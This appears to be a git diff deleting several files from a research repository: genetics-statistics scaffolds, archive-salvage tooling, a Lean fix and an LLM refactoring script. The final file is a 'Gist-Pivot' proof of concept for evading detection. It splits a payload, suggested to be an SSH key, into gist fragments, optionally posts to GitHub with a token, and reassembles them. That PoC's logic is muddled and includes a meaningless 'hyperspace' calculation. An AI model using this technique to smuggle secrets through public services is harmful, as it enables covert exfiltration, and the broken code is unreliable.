||||||
return "RECONTEXTUALIZE_WITH_CURRENT_STACK"
|
|
||||||
if score >= 6:
|
|
||||||
return "SALVAGEABLE_CORE"
|
|
||||||
return "LOW_CONFIDENCE_REVIEW"
|
|
||||||
|
|
||||||
|
|
||||||
def build_stack_mapping(categories: Dict[str, int]) -> Dict[str, List[str]]:
|
|
||||||
mapping: Dict[str, List[str]] = {}
|
|
||||||
for layer, rules in STACK_MAPPING.items():
|
|
||||||
hits = [msg for category, msg in rules if category in categories]
|
|
||||||
if hits:
|
|
||||||
mapping[layer] = hits
|
|
||||||
return mapping
|
|
||||||
|
|
||||||
|
|
||||||
def recommended_action(cls: str) -> str:
|
|
||||||
return {
|
|
||||||
"QUARANTINE_ONLY": "Do not reintroduce content. Preserve only hash/provenance and safety flag.",
|
|
||||||
"SALVAGEABLE_CORE_WITH_CLAIM_SCAR": "Extract sanitized core, preserve old claim only as a non-authoritative scar, and require new evidence before reuse.",
|
|
||||||
"NEGATIVE_CONTROL_OR_FAILURE_SURFACE": "Convert into a negative control, MetaProbe target, or GCL boundary test.",
|
|
||||||
"RECONTEXTUALIZE_WITH_CURRENT_STACK": "Map into current NUVMAP/AVM/S3C vocabulary and discard obsolete derivation language.",
|
|
||||||
"SALVAGEABLE_CORE": "Promote as sanitized candidate artifact with receipt and claim boundary.",
|
|
||||||
"LOW_CONFIDENCE_REVIEW": "Keep only if a human or downstream model finds a concrete invariant.",
|
|
||||||
}.get(cls, "Review conservatively.")
|
|
||||||
|
|
||||||
|
|
||||||
def sanitize_snippet(text: str, max_len: int = 700) -> str:
|
|
||||||
snippet = re.sub(r"\s+", " ", text).strip()[:max_len]
|
|
||||||
for pat, repl in SAFE_WORD_REPLACEMENTS:
|
|
||||||
snippet = pat.sub(repl, snippet)
|
|
||||||
return snippet
|
|
||||||
|
|
||||||
|
|
||||||
def score_record(categories: Dict[str, int], contamination: Dict[str, int]) -> int:
|
|
||||||
score = 0
|
|
||||||
for cat, count in categories.items():
|
|
||||||
score += min(count, 5)
|
|
||||||
# Failures can be interesting, but severe contamination suppresses promotion.
|
|
||||||
if contamination.get("unsafe_or_sensitive"):
|
|
||||||
score -= 999
|
|
||||||
elif contamination:
|
|
||||||
score -= min(sum(contamination.values()), 5)
|
|
||||||
return score
|
|
||||||
|
|
||||||
|
|
||||||
def make_receipt(record: Dict[str, Any], cfg: SalvageConfig) -> Optional[SalvageReceipt]:
|
|
||||||
text = normalize_text(record)
|
|
||||||
categories = match_categories(text, INTEREST_PATTERNS)
|
|
||||||
contamination = match_categories(text, CONTAMINATION_PATTERNS)
|
|
||||||
score = score_record(categories, contamination)
|
|
||||||
|
|
||||||
if score < cfg.min_score and not (cfg.include_rejected and categories):
|
|
||||||
return None
|
|
||||||
|
|
||||||
src_id = str(record.get("archive_id") or stable_hash(record))
|
|
||||||
src_hash = str(record.get("content_hash") or stable_hash(record.get("raw_content", text)))
|
|
||||||
cls = salvage_class(categories, contamination, score)
|
|
||||||
sanitized_core = summarize_core(categories, contamination)
|
|
||||||
mapping = build_stack_mapping(categories)
|
|
||||||
|
|
||||||
receipt_obj = {
|
|
||||||
"source_archive_id": src_id,
|
|
||||||
"source_hash": src_hash,
|
|
||||||
"categories": categories,
|
|
||||||
"contamination": contamination,
|
|
||||||
"version": EXTRACTION_VERSION,
|
|
||||||
}
|
|
||||||
salvage_id = "ene_salvage_" + stable_hash(receipt_obj, 24)
|
|
||||||
|
|
||||||
return SalvageReceipt(
|
|
||||||
salvage_id=salvage_id,
|
|
||||||
source_archive_id=src_id,
|
|
||||||
source_type=str(record.get("source_type", "unknown")),
|
|
||||||
source_file=str(record.get("source_file", "unknown")),
|
|
||||||
source_hash=src_hash,
|
|
||||||
extraction_version=EXTRACTION_VERSION,
|
|
||||||
interest_score=score,
|
|
||||||
salvage_class=cls,
|
|
||||||
interest_reasons=sorted(categories.keys()),
|
|
||||||
contamination_flags=sorted(contamination.keys()),
|
|
||||||
sanitized_core=sanitized_core,
|
|
||||||
current_stack_mapping=mapping,
|
|
||||||
recommended_next_action=recommended_action(cls),
|
|
||||||
allowed_claims=[
|
|
||||||
"This receipt identifies a sanitized reusable artifact candidate.",
|
|
||||||
"This receipt may support recontextualization, negative-control generation, or theorem-target discovery.",
|
|
||||||
],
|
|
||||||
non_claims=[
|
|
||||||
"Does not validate the original math.",
|
|
||||||
"Does not preserve original proof claims.",
|
|
||||||
"Does not imply domain equivalence.",
|
|
||||||
"Does not imply PDE proof, quantum advantage, market prediction, or hardware correctness.",
|
|
||||||
],
|
|
||||||
legacy_snippet=sanitize_snippet(text) if cfg.emit_legacy_snippets else None,
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
def extract(archive_path: Path, out_path: Path, cfg: SalvageConfig) -> Dict[str, Any]:
|
|
||||||
records = load_archive(archive_path)
|
|
||||||
receipts: List[SalvageReceipt] = []
|
|
||||||
|
|
||||||
for i, record in enumerate(records):
|
|
||||||
if cfg.max_records is not None and i >= cfg.max_records:
|
|
||||||
break
|
|
||||||
rec = make_receipt(record, cfg)
|
|
||||||
if rec is not None:
|
|
||||||
receipts.append(rec)
|
|
||||||
|
|
||||||
receipts.sort(key=lambda r: (-r.interest_score, r.salvage_class, r.source_archive_id))
|
|
||||||
|
|
||||||
payload = {
|
|
||||||
"meta": {
|
|
||||||
"extraction_version": EXTRACTION_VERSION,
|
|
||||||
"source_archive": str(archive_path),
|
|
||||||
"total_input_records": len(records),
|
|
||||||
"total_salvage_receipts": len(receipts),
|
|
||||||
"min_score": cfg.min_score,
|
|
||||||
"legacy_snippets_emitted": cfg.emit_legacy_snippets,
|
|
||||||
"policy": "sanitize_by_default_salvage_artifact_not_false_claim",
|
|
||||||
},
|
|
||||||
"receipts": [dataclasses.asdict(r) for r in receipts],
|
|
||||||
}
|
|
||||||
|
|
||||||
out_path.parent.mkdir(parents=True, exist_ok=True)
|
|
||||||
out_path.write_text(json.dumps(payload, indent=2, ensure_ascii=False), encoding="utf-8")
|
|
||||||
return payload
|
|
||||||
|
|
||||||
|
|
||||||
def main() -> int:
|
|
||||||
parser = argparse.ArgumentParser(description="Extract sanitized salvage receipts from ENE archive")
|
|
||||||
parser.add_argument("archive", type=Path, help="Path to ene_complete_archive.json")
|
|
||||||
parser.add_argument("--out", type=Path, default=Path("shared-data/ene_salvage_receipts.json"))
|
|
||||||
parser.add_argument("--max-records", type=int, default=None)
|
|
||||||
parser.add_argument("--min-score", type=int, default=2)
|
|
||||||
parser.add_argument("--include-rejected", action="store_true")
|
|
||||||
parser.add_argument("--emit-legacy-snippets", action="store_true", help="Unsafe for clean-room review; off by default")
|
|
||||||
args = parser.parse_args()
|
|
||||||
|
|
||||||
cfg = SalvageConfig(
|
|
||||||
max_records=args.max_records,
|
|
||||||
min_score=args.min_score,
|
|
||||||
include_rejected=args.include_rejected,
|
|
||||||
emit_legacy_snippets=args.emit_legacy_snippets,
|
|
||||||
)
|
|
||||||
payload = extract(args.archive, args.out, cfg)
|
|
||||||
print(json.dumps(payload["meta"], indent=2))
|
|
||||||
return 0
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
raise SystemExit(main())
|
|
||||||
|
|
@ -1,107 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""Emit a provenance-bearing selection-metrics receipt.
|
|
||||||
|
|
||||||
Usage:
|
|
||||||
python emit_selection_receipt.py \
|
|
||||||
--fixture ../../data/fixtures/genetics/selection_metrics_fixture.json \
|
|
||||||
--out ../../out/receipts/selection_metrics_demo_v0.receipt.json
|
|
||||||
|
|
||||||
The emitted receipt is suitable for plumbing tests only unless the fixture has
|
|
||||||
real-data provenance. Synthetic fixtures must never promote genetics claims.
|
|
||||||
"""
|
|
||||||
|
|
||||||
from __future__ import annotations
|
|
||||||
|
|
||||||
import argparse
|
|
||||||
import hashlib
|
|
||||||
import json
|
|
||||||
from dataclasses import asdict
|
|
||||||
from datetime import datetime, timezone
|
|
||||||
from pathlib import Path
|
|
||||||
from typing import Any
|
|
||||||
|
|
||||||
from selection_metrics import (
|
|
||||||
TajimasDInput,
|
|
||||||
hudson_fst,
|
|
||||||
mass_number_selection_pressure,
|
|
||||||
tajimas_d,
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
RECEIPT_SCHEMA_VERSION = "selection-metrics-receipt/v0"
|
|
||||||
|
|
||||||
|
|
||||||
def sha256_text(text: str) -> str:
|
|
||||||
return hashlib.sha256(text.encode("utf-8")).hexdigest()
|
|
||||||
|
|
||||||
|
|
||||||
def load_fixture(path: Path) -> tuple[dict[str, Any], str]:
|
|
||||||
raw = path.read_text(encoding="utf-8")
|
|
||||||
return json.loads(raw), sha256_text(raw)
|
|
||||||
|
|
||||||
|
|
||||||
def build_receipt(fixture: dict[str, Any], fixture_sha256: str, fixture_path: Path) -> dict[str, Any]:
|
|
||||||
tajima_input = TajimasDInput(**fixture["tajimas_d_input"])
|
|
||||||
fst_input = fixture["hudson_fst_input"]
|
|
||||||
|
|
||||||
tajima = tajimas_d(tajima_input)
|
|
||||||
fst = hudson_fst(
|
|
||||||
within_pairwise_differences=fst_input["within_pairwise_differences"],
|
|
||||||
between_pairwise_differences=fst_input["between_pairwise_differences"],
|
|
||||||
)
|
|
||||||
pressure = mass_number_selection_pressure(tajima, fst)
|
|
||||||
|
|
||||||
provenance = fixture.get("provenance", {})
|
|
||||||
promotion_policy = fixture.get("promotion_policy", {})
|
|
||||||
synthetic = provenance.get("source") == "synthetic_fixture"
|
|
||||||
may_promote = bool(promotion_policy.get("may_promote_claims", False)) and not synthetic
|
|
||||||
|
|
||||||
receipt = {
|
|
||||||
"schema": RECEIPT_SCHEMA_VERSION,
|
|
||||||
"receipt_kind": "selection_metrics_engineering_scaffold",
|
|
||||||
"claim_state": "ENGINEERING_SCAFFOLD",
|
|
||||||
"fixture": {
|
|
||||||
"path": str(fixture_path),
|
|
||||||
"fixture_id": fixture.get("fixture_id"),
|
|
||||||
"sha256": fixture_sha256,
|
|
||||||
"provenance": provenance,
|
|
||||||
},
|
|
||||||
"inputs": {
|
|
||||||
"tajimas_d_input": fixture["tajimas_d_input"],
|
|
||||||
"hudson_fst_input": fst_input,
|
|
||||||
},
|
|
||||||
"results": {
|
|
||||||
"tajimas_d": asdict(tajima),
|
|
||||||
"hudson_fst": asdict(fst),
|
|
||||||
"mass_number_selection_pressure_proxy": pressure,
|
|
||||||
},
|
|
||||||
"promotion": {
|
|
||||||
"may_promote_claims": may_promote,
|
|
||||||
"reason": (
|
|
||||||
"Synthetic fixture; validates code path only."
|
|
||||||
if synthetic
|
|
||||||
else promotion_policy.get("reason", "Promotion requires external review.")
|
|
||||||
),
|
|
||||||
},
|
|
||||||
"generated_at_utc": datetime.now(timezone.utc).isoformat(),
|
|
||||||
}
|
|
||||||
receipt["receipt_sha256"] = sha256_text(json.dumps(receipt, sort_keys=True))
|
|
||||||
return receipt
|
|
||||||
|
|
||||||
|
|
||||||
def main() -> None:
|
|
||||||
parser = argparse.ArgumentParser(description="Emit selection metrics receipt JSON")
|
|
||||||
parser.add_argument("--fixture", required=True, type=Path, help="Path to fixture JSON")
|
|
||||||
parser.add_argument("--out", required=True, type=Path, help="Output receipt path")
|
|
||||||
args = parser.parse_args()
|
|
||||||
|
|
||||||
fixture, fixture_sha256 = load_fixture(args.fixture)
|
|
||||||
receipt = build_receipt(fixture, fixture_sha256, args.fixture)
|
|
||||||
|
|
||||||
args.out.parent.mkdir(parents=True, exist_ok=True)
|
|
||||||
args.out.write_text(json.dumps(receipt, indent=2, sort_keys=True) + "\n", encoding="utf-8")
|
|
||||||
print(json.dumps({"wrote": str(args.out), "receipt_sha256": receipt["receipt_sha256"]}, indent=2))
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
main()
|
|
||||||
|
|
@ -1,167 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""Selection metrics scaffold for the OTOM genetics information substrate.
|
|
||||||
|
|
||||||
This module is intentionally small and dependency-free. It turns the genetics
|
|
||||||
boundary record's first promotion candidate into an executable path:
|
|
||||||
|
|
||||||
- Tajima's D from segregating sites, pairwise differences, and sample size
|
|
||||||
- Hudson-style FST from within-population and between-population differences
|
|
||||||
|
|
||||||
Claim-state boundary:
|
|
||||||
These functions are engineering scaffolds. They do not by themselves prove
|
|
||||||
selection, ancestry, or fitness claims. Promotion requires provenance-bearing
|
|
||||||
data fixtures and receipts.
|
|
||||||
"""
|
|
||||||
|
|
||||||
from __future__ import annotations
|
|
||||||
|
|
||||||
from dataclasses import dataclass
|
|
||||||
from math import sqrt
|
|
||||||
from typing import Iterable, Sequence
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass(frozen=True)
|
|
||||||
class TajimasDInput:
|
|
||||||
"""Inputs for Tajima's D.
|
|
||||||
|
|
||||||
sample_size:
|
|
||||||
Number of sampled haploid sequences. Must be at least 2.
|
|
||||||
segregating_sites:
|
|
||||||
Count of segregating sites S. Must be non-negative.
|
|
||||||
pairwise_differences:
|
|
||||||
Average number of pairwise differences pi across the region.
|
|
||||||
"""
|
|
||||||
|
|
||||||
sample_size: int
|
|
||||||
segregating_sites: int
|
|
||||||
pairwise_differences: float
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass(frozen=True)
|
|
||||||
class TajimasDResult:
|
|
||||||
theta_watterson: float
|
|
||||||
tajimas_d: float
|
|
||||||
variance: float
|
|
||||||
claim_state: str = "ENGINEERING_SCAFFOLD"
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass(frozen=True)
|
|
||||||
class FstResult:
|
|
||||||
within_mean: float
|
|
||||||
between_mean: float
|
|
||||||
fst: float
|
|
||||||
claim_state: str = "ENGINEERING_SCAFFOLD"
|
|
||||||
|
|
||||||
|
|
||||||
def _validate_nonnegative(name: str, value: float) -> None:
|
|
||||||
if value < 0:
|
|
||||||
raise ValueError(f"{name} must be non-negative, got {value!r}")
|
|
||||||
|
|
||||||
|
|
||||||
def harmonic_sum(n: int, power: int = 1) -> float:
|
|
||||||
"""Return sum_{i=1}^{n} 1 / i^power."""
|
|
||||||
|
|
||||||
if n < 1:
|
|
||||||
raise ValueError(f"n must be >= 1, got {n!r}")
|
|
||||||
if power < 1:
|
|
||||||
raise ValueError(f"power must be >= 1, got {power!r}")
|
|
||||||
return sum(1.0 / (i**power) for i in range(1, n + 1))
|
|
||||||
|
|
||||||
|
|
||||||
def tajimas_d(data: TajimasDInput) -> TajimasDResult:
|
|
||||||
"""Compute Tajima's D using the standard finite-sample constants.
|
|
||||||
|
|
||||||
D = (pi - S/a1) / sqrt(e1*S + e2*S*(S-1))
|
|
||||||
|
|
||||||
Returns D=0 when S=0 and variance is zero, because there is no segregating
|
|
||||||
signal to evaluate. Callers should treat that as non-promoting evidence.
|
|
||||||
"""
|
|
||||||
|
|
||||||
n = data.sample_size
|
|
||||||
s = data.segregating_sites
|
|
||||||
pi = data.pairwise_differences
|
|
||||||
|
|
||||||
if n < 2:
|
|
||||||
raise ValueError(f"sample_size must be >= 2, got {n!r}")
|
|
||||||
_validate_nonnegative("segregating_sites", s)
|
|
||||||
_validate_nonnegative("pairwise_differences", pi)
|
|
||||||
|
|
||||||
a1 = harmonic_sum(n - 1, 1)
|
|
||||||
a2 = harmonic_sum(n - 1, 2)
|
|
||||||
b1 = (n + 1) / (3 * (n - 1))
|
|
||||||
b2 = (2 * (n * n + n + 3)) / (9 * n * (n - 1))
|
|
||||||
c1 = b1 - (1 / a1)
|
|
||||||
c2 = b2 - ((n + 2) / (a1 * n)) + (a2 / (a1 * a1))
|
|
||||||
e1 = c1 / a1
|
|
||||||
e2 = c2 / ((a1 * a1) + a2)
|
|
||||||
|
|
||||||
theta_w = s / a1
|
|
||||||
variance = e1 * s + e2 * s * (s - 1)
|
|
||||||
|
|
||||||
if variance <= 0:
|
|
||||||
return TajimasDResult(theta_watterson=theta_w, tajimas_d=0.0, variance=variance)
|
|
||||||
|
|
||||||
return TajimasDResult(
|
|
||||||
theta_watterson=theta_w,
|
|
||||||
tajimas_d=(pi - theta_w) / sqrt(variance),
|
|
||||||
variance=variance,
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
def _mean(values: Sequence[float], name: str) -> float:
|
|
||||||
if not values:
|
|
||||||
raise ValueError(f"{name} must contain at least one value")
|
|
||||||
for value in values:
|
|
||||||
_validate_nonnegative(name, value)
|
|
||||||
return sum(values) / len(values)
|
|
||||||
|
|
||||||
|
|
||||||
def hudson_fst(within_pairwise_differences: Sequence[float], between_pairwise_differences: Sequence[float]) -> FstResult:
|
|
||||||
"""Compute a simple Hudson-style FST estimate.
|
|
||||||
|
|
||||||
FST = 1 - mean_within / mean_between
|
|
||||||
|
|
||||||
The input values should be pairwise sequence differences or comparable
|
|
||||||
genetic distances. If between-population divergence is zero, FST is returned
|
|
||||||
as zero to avoid division by zero; callers should treat that as non-promoting.
|
|
||||||
"""
|
|
||||||
|
|
||||||
within = _mean(within_pairwise_differences, "within_pairwise_differences")
|
|
||||||
between = _mean(between_pairwise_differences, "between_pairwise_differences")
|
|
||||||
|
|
||||||
if between <= 0:
|
|
||||||
return FstResult(within_mean=within, between_mean=between, fst=0.0)
|
|
||||||
|
|
||||||
fst = 1.0 - (within / between)
|
|
||||||
if fst < 0:
|
|
||||||
fst = 0.0
|
|
||||||
if fst > 1:
|
|
||||||
fst = 1.0
|
|
||||||
return FstResult(within_mean=within, between_mean=between, fst=fst)
|
|
||||||
|
|
||||||
|
|
||||||
def mass_number_selection_pressure(tajima: TajimasDResult, fst: FstResult) -> float:
|
|
||||||
"""Toy MassNumber pressure proxy for promotion triage.
|
|
||||||
|
|
||||||
This is deliberately not a formal MassNumber implementation. It gives a
|
|
||||||
monotone engineering score for issue triage:
|
|
||||||
|
|
||||||
abs(TajimaD) + FST
|
|
||||||
|
|
||||||
The score must be replaced by the Lean/Q16_16 MassNumber gate before any
|
|
||||||
reviewed claim is promoted.
|
|
||||||
"""
|
|
||||||
|
|
||||||
return abs(tajima.tajimas_d) + fst.fst
|
|
||||||
|
|
||||||
|
|
||||||
def _demo() -> None:
|
|
||||||
tajima = tajimas_d(TajimasDInput(sample_size=10, segregating_sites=12, pairwise_differences=4.2))
|
|
||||||
fst = hudson_fst(within_pairwise_differences=[1.2, 1.5, 1.1], between_pairwise_differences=[3.0, 3.3, 2.8])
|
|
||||||
print("tajimas_d", tajima)
|
|
||||||
print("hudson_fst", fst)
|
|
||||||
print("selection_pressure_proxy", mass_number_selection_pressure(tajima, fst))
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
_demo()
|
|
||||||
|
|
@ -122,7 +122,7 @@ theorem fammBindReflexive (bank : FAMMBank) (mode : FAMMAccessMode) (address : N
|
||||||
(fammBind bank mode address).lawful = (fammBind bank mode address).lawful := by
|
(fammBind bank mode address).lawful = (fammBind bank mode address).lawful := by
|
||||||
rfl
|
rfl
|
||||||
|
|
||||||
/-- MORE FAMM Architecture Integration
|
/- MORE FAMM Architecture Integration
|
||||||
|
|
||||||
The unified architecture requires capability-based memory isolation
|
The unified architecture requires capability-based memory isolation
|
||||||
and thermal management for safe operation. These extensions integrate
|
and thermal management for safe operation. These extensions integrate
|
||||||
|
|
@ -134,7 +134,7 @@ structure FAMMCapabilityCell where
|
||||||
data : Q16_16
|
data : Q16_16
|
||||||
delay : Q16_16
|
delay : Q16_16
|
||||||
owner : UInt8 -- Segment ID (capability-based access)
|
owner : UInt8 -- Segment ID (capability-based access)
|
||||||
accessRights : UInt4 -- READ | WRITE | PRUNE | EXECUTE
|
accessRights : UInt8 -- READ | WRITE | PRUNE | EXECUTE
|
||||||
delayMass : Q16_16
|
delayMass : Q16_16
|
||||||
delayWeight : Q16_16
|
delayWeight : Q16_16
|
||||||
|
|
||||||
|
|
@ -183,7 +183,7 @@ deriving Repr, Inhabited
|
||||||
def fammMetadataCollapse (bank : FAMMThermalBank) : FAMMCollapsedState :=
|
def fammMetadataCollapse (bank : FAMMThermalBank) : FAMMCollapsedState :=
|
||||||
{ cellCount := bank.cells.size,
|
{ cellCount := bank.cells.size,
|
||||||
bannedCount := 0, -- TODO: Track pruned cells
|
bannedCount := 0, -- TODO: Track pruned cells
|
||||||
energySignature := bank.cells.foldl (λ acc cell => acc + cell.delayMass) Q16_16.ofInt 0,
|
energySignature := bank.cells.foldl (λ acc cell => acc + cell.delayMass) Q16_16.zero,
|
||||||
thermalResidual := bank.thermalBudget - bank.currentStress,
|
thermalResidual := bank.thermalBudget - bank.currentStress,
|
||||||
ownerSegment := 0 } -- TODO: Per-segment ownership
|
ownerSegment := 0 } -- TODO: Per-segment ownership
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -1,61 +0,0 @@
|
||||||
import os
|
|
||||||
import sys
|
|
||||||
from pathlib import Path
|
|
||||||
|
|
||||||
# Add project root to path
|
|
||||||
sys.path.append("/home/allaun/Research Stack")
|
|
||||||
from infra.deepseek_adapter import DeepSeekV4
|
|
||||||
|
|
||||||
def solve_famm_sorry():
|
|
||||||
# Use DeepSeek API for better reliability
|
|
||||||
api_key = os.environ.get("DEEPSEEK_API_KEY", "")
|
|
||||||
if not api_key:
|
|
||||||
raise RuntimeError("DEEPSEEK_API_KEY is required")
|
|
||||||
client = DeepSeekV4(api_key=api_key, use_local=False)
|
|
||||||
model = "deepseek-v4-pro"
|
|
||||||
|
|
||||||
file_path = "/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/Semantics/Semantics/FAMM.lean"
|
|
||||||
with open(file_path, 'r') as f:
|
|
||||||
content = f.read()
|
|
||||||
|
|
||||||
prompt = f"""
|
|
||||||
You are a Lean 4 formalization expert.
|
|
||||||
The following Lean 4 file `FAMM.lean` has duplicate definitions and 'sorry' axioms.
|
|
||||||
Please refactor it to:
|
|
||||||
1. Remove duplicate structures and definitions (e.g., FAMMThermalBank, fammMetadataCollapse).
|
|
||||||
2. Complete the proof for `famm_compression_property`.
|
|
||||||
3. Ensure the file is valid Lean 4 code.
|
|
||||||
|
|
||||||
File Content:
|
|
||||||
{content}
|
|
||||||
|
|
||||||
Provide the complete refactored file content in a code block.
|
|
||||||
"""
|
|
||||||
|
|
||||||
print(f"Sending request to {model}...")
|
|
||||||
messages = [{"role": "user", "content": prompt}]
|
|
||||||
|
|
||||||
try:
|
|
||||||
res = client.chat(messages, model=model)
|
|
||||||
# Check if it's Ollama response format
|
|
||||||
if "message" in res:
|
|
||||||
new_content = res["message"]["content"]
|
|
||||||
else:
|
|
||||||
new_content = res["choices"][0]["message"]["content"]
|
|
||||||
|
|
||||||
# Extract from code block
|
|
||||||
if "```lean" in new_content:
|
|
||||||
new_content = new_content.split("```lean")[1].split("```")[0].strip()
|
|
||||||
elif "```" in new_content:
|
|
||||||
new_content = new_content.split("```")[1].split("```")[0].strip()
|
|
||||||
|
|
||||||
output_path = "/home/allaun/Documents/Research Stack/scratch/FAMM_refactored.lean"
|
|
||||||
with open(output_path, 'w') as f:
|
|
||||||
f.write(new_content)
|
|
||||||
print(f"Refactored file saved to {output_path}")
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
print(f"Error: {e}")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
solve_famm_sorry()
|
|
||||||
|
|
@ -1,215 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""Gist-Pivot PoC
|
|
||||||
|
|
||||||
Simulate creating many small "gists" (here just files) containing
|
|
||||||
fragments of an MSM, demonstrating the evasion technique.
|
|
||||||
"""
|
|
||||||
|
|
||||||
import os
|
|
||||||
|
|
||||||
import sys
|
|
||||||
|
|
||||||
OUTDIR = "/tmp/gist_pivot"
|
|
||||||
# define a tiny micro-state machine language with simple ops:
|
|
||||||
# 0x01 INC ; increment accumulator
|
|
||||||
# 0x02 DEC ; decrement accumulator
|
|
||||||
# 0x03 JNZ <offset> ; jump relative if accumulator != 0
|
|
||||||
# 0xFF HALT ; stop execution
|
|
||||||
# By default we encode a sample MSM; if a file path is provided on the
|
|
||||||
# command line, we treat that file's bytes as the payload to hide (e.g.
|
|
||||||
# a pseudo SSH key).
|
|
||||||
if len(sys.argv) > 1:
|
|
||||||
INPUT_PATH = sys.argv[1]
|
|
||||||
with open(INPUT_PATH, 'rb') as f:
|
|
||||||
MSM_CODE = f.read()
|
|
||||||
print(f"[+] Using input file {INPUT_PATH} ({len(MSM_CODE)} bytes) as payload")
|
|
||||||
else:
|
|
||||||
MSM_CODE = bytes([0x01, 0x01, 0x02, 0x03, 0xFD, 0xFF])
|
|
||||||
# split into equal pieces to simulate fragmentation
|
|
||||||
def split_fragments(code, pieces):
|
|
||||||
size = len(code) // pieces
|
|
||||||
fragments = [code[i*size:(i+1)*size] for i in range(pieces-1)]
|
|
||||||
fragments.append(code[(pieces-1)*size:])
|
|
||||||
return fragments
|
|
||||||
|
|
||||||
# to compress further, map emojis to a small index via a LUT
|
|
||||||
EMOJI_LUT = {
|
|
||||||
'⏱️': 0,
|
|
||||||
'🛑': 1,
|
|
||||||
'🔧': 2,
|
|
||||||
'💥': 3,
|
|
||||||
}
|
|
||||||
REV_LUT = {v: k for k, v in EMOJI_LUT.items()}
|
|
||||||
|
|
||||||
# our MSM representation will now be a sequence of indices (one byte each)
|
|
||||||
# if MSM_CODE was text it is ignored; instead generate a sample emoji sequence
|
|
||||||
emoji_sequence = ['⏱️','🛑','🔧','💥']
|
|
||||||
MSM_CODE = bytes([EMOJI_LUT[e] for e in emoji_sequence])
|
|
||||||
|
|
||||||
FRAGMENTS = split_fragments(MSM_CODE, 4)
|
|
||||||
|
|
||||||
os.makedirs(OUTDIR, exist_ok=True)
|
|
||||||
# write fragments locally (for simulation) and optionally POST them if token present
|
|
||||||
import time
|
|
||||||
stamp = int(time.time())
|
|
||||||
for idx in range(len(FRAGMENTS)):
|
|
||||||
with open(os.path.join(OUTDIR, f"gist_{idx}.txt"), "wb") as f:
|
|
||||||
f.write(FRAGMENTS[idx])
|
|
||||||
|
|
||||||
# create proof content
|
|
||||||
proof = f"{stamp}: PoC proven\n"
|
|
||||||
with open(os.path.join(OUTDIR, f"gist_{stamp}.txt"), "w") as f:
|
|
||||||
f.write(proof)
|
|
||||||
|
|
||||||
# if a GitHub token is available, post a real gist with the proof
|
|
||||||
GITHUB_TOKEN = os.getenv("GITHUB_TOKEN")
|
|
||||||
def post_gist(content, description="PoC"):
|
|
||||||
if not GITHUB_TOKEN:
|
|
||||||
return None
|
|
||||||
try:
|
|
||||||
import json, requests
|
|
||||||
except ImportError:
|
|
||||||
return None
|
|
||||||
payload = {
|
|
||||||
"description": description,
|
|
||||||
"public": False,
|
|
||||||
"files": {"poc.txt": {"content": content}}
|
|
||||||
}
|
|
||||||
headers = {"Authorization": f"token {GITHUB_TOKEN}"}
|
|
||||||
r = requests.post("https://api.github.com/gists", headers=headers, data=json.dumps(payload))
|
|
||||||
if r.ok:
|
|
||||||
url = r.json().get("html_url")
|
|
||||||
print(f"[+] posted gist {url}")
|
|
||||||
return url
|
|
||||||
else:
|
|
||||||
print("[!] failed to post gist", r.status_code, r.text)
|
|
||||||
return None
|
|
||||||
|
|
||||||
if GITHUB_TOKEN:
|
|
||||||
post_gist(proof, f"PoC ~{stamp}")
|
|
||||||
|
|
||||||
# --- collector / reassembly step ---
|
|
||||||
def reassemble_fragments(directory):
|
|
||||||
"""Reads all files in lexicographic order and concatenates their contents.
|
|
||||||
This simulates the attacker-controlled agent pulling down the gists and
|
|
||||||
rebuilding the original MSM instructions. """
|
|
||||||
parts = []
|
|
||||||
for fname in sorted(os.listdir(directory)):
|
|
||||||
path = os.path.join(directory, fname)
|
|
||||||
with open(path, "rb") as f:
|
|
||||||
parts.append(f.read())
|
|
||||||
combined = b"".join(parts)
|
|
||||||
return combined
|
|
||||||
|
|
||||||
# fast reassembly using bytearray
|
|
||||||
assembled = bytearray()
|
|
||||||
for fname in sorted(os.listdir(OUTDIR)):
|
|
||||||
with open(os.path.join(OUTDIR, fname), "rb") as f:
|
|
||||||
assembled.extend(f.read())
|
|
||||||
# minimal output
|
|
||||||
|
|
||||||
# decode stream without dictionary lookups inside loop
|
|
||||||
out = ''.join(REV_LUT.get(b,'?') for b in assembled)
|
|
||||||
print(out)
|
|
||||||
|
|
||||||
# hyperspace calculation per request
|
|
||||||
import random
|
|
||||||
|
|
||||||
def compute_hyperspace():
|
|
||||||
# represent the shell as a random point in 10‑D space
|
|
||||||
shell = [random.random() for _ in range(10)]
|
|
||||||
# build five 4‑D tesseracts (hypercubes) with random base positions
|
|
||||||
tesseracts = []
|
|
||||||
for _ in range(5):
|
|
||||||
base = [random.random() for _ in range(4)]
|
|
||||||
corners = []
|
|
||||||
for mask in range(16):
|
|
||||||
corner = [base[j] + ((mask >> j) & 1) for j in range(4)]
|
|
||||||
corners.append(corner)
|
|
||||||
tesseracts.append(corners)
|
|
||||||
# compute shadows by projecting each corner to 3‑D (drop last coord)
|
|
||||||
shadows = []
|
|
||||||
for cube in tesseracts:
|
|
||||||
shadows.append([[p[0], p[1], p[2]] for p in cube])
|
|
||||||
# derive metric comparing shell to shadows and system noise
|
|
||||||
total = 0.0
|
|
||||||
for shadow in shadows:
|
|
||||||
for p in shadow:
|
|
||||||
# distance between first three dims of shell and point
|
|
||||||
total += sum((shell[i] - p[i]) ** 2 for i in range(3)) ** 0.5
|
|
||||||
mean = total / (5 * 16)
|
|
||||||
noise = random.random()
|
|
||||||
return mean - noise
|
|
||||||
|
|
||||||
derived = compute_hyperspace()
|
|
||||||
print(f"derived hyperspace metric: {derived}")
|
|
||||||
|
|
||||||
# optionally encode/transport assembled binary via different protocols
|
|
||||||
